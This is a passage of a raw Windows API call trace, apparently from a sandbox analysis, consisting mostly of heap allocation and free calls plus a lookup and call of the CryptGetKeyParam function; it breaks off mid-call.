1 [0180.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0180.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0180.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0180.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0180.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0180.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0180.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0180.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0180.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0180.003] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0180.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0180.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0180.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0180.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0180.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0180.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0180.003] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0180.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0180.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd558 [0180.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0180.003] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0180.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0180.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0180.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0180.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0180.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0180.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0180.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0180.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0180.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0180.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0180.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0180.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0180.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0180.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0180.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0180.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0180.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0180.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0180.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0180.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0180.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0180.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0180.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0180.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0180.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0180.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0180.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0180.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0180.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0180.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0180.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0180.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0180.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0180.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0180.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0180.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0180.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0180.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0180.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0180.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0180.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0180.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0180.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0180.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0180.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0180.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0180.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0180.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0180.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0180.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0180.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0180.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0180.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0180.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0180.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0180.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0180.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0180.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0180.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0180.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0180.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0180.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0180.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0180.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0180.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0180.007] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0180.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0180.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0180.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0180.008] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0180.008] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2638, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2638*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0180.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0180.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0180.010] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0180.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0180.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0180.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0180.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0180.010] PeekMessageW (in: lpMsg=0x87e924, 